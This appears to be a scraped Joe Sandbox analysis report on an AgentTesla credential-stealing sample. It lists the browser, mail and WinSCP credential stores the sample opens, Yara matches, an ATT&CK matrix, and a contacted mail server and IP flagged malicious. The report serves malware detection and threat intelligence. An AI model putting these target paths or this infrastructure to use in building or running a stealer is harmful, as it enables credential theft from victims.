                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2877478732.000000000311E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 4856, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 7208, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 4856, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 7208, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3dbc340.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3d81920.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2877478732.000000000311E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2877478732.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 4856, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 7208, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		111
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    Input Capture                    		1
                    Process Discovery                    		Remote Desktop Protocol1
                    Input Capture                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                    Virtualization/Sandbox Evasion                    		1
                    Credentials in Registry                    		141
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares11
                    Archive Collected Data                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object Model1
                    Data from Local System                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information                    		Cached Domain Credentials24
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                    SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe31%VirustotalBrowse
                    SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.elec-qatar.com3%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                    http://mail.elec-qatar.com0%Avira URL Cloudsafe
                    http://tempuri.org/Locations.xsdkServer=ARCHIT;Database=Sample;Trusted_Connection=TrueUPlease0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                    http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                    http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                    http://www.zhongyicts.com.cn1%VirustotalBrowse
                    http://www.founder.com.cn/cn0%VirustotalBrowse
                    http://tempuri.org/Locations.xsdkServer=ARCHIT;Database=Sample;Trusted_Connection=TrueUPlease1%VirustotalBrowse
                    http://mail.elec-qatar.com3%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.elec-qatar.com
                    		50.87.139.143
                    		truetrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.comSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1638793445.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2875221020.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Locations.xsdkServer=ARCHIT;Database=Sample;Trusted_Connection=TrueUPleaseSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exefalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://mail.elec-qatar.comSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2877478732.0000000003126000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fonts.comSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sakkal.comSecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1641297030.0000000006CC2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000000.00000002.1640952261.0000000005BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          50.87.139.143
                                          		mail.elec-qatar.comUnited States
                                          		46606UNIFIEDLAYER-AS-1UStrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1414887
                                          Start date and time:2024-03-25 08:28:05 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:7
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 71
                                          • Number of non-executed functions: 5
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, PID 7208 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          04:28:51API Interceptor32x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          50.87.139.143NEW ORDER 98540-0.exeGet hashmaliciousAgentTeslaBrowse
                                            Documents of shipment 3-2024.exeGet hashmaliciousAgentTeslaBrowse
                                              SHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                Order 19A20060.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              mail.elec-qatar.comNEW ORDER 98540-0.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 50.87.139.143
                                                              Documents of shipment 3-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 50.87.139.143
                                                              SHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 50.87.139.143
                                                              Order 19A20060.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143
                                                              Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143
                                                              SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143
                                                              SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143
                                                              New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143
                                                              Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143
                                                              SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 50.87.139.143

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              UNIFIEDLAYER-AS-1USfile.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                              • 192.185.16.114
                                                              SecuriteInfo.com.Win64.PWSX-gen.371.14469.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 192.254.225.136
                                                              https://duchessgarden.sn/Get hashmaliciousUnknownBrowse
                                                              • 162.241.27.25
                                                              DHL STATEMENT OF ACCOUNT - 1003657363.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 50.87.195.61
                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                              • 192.185.16.114
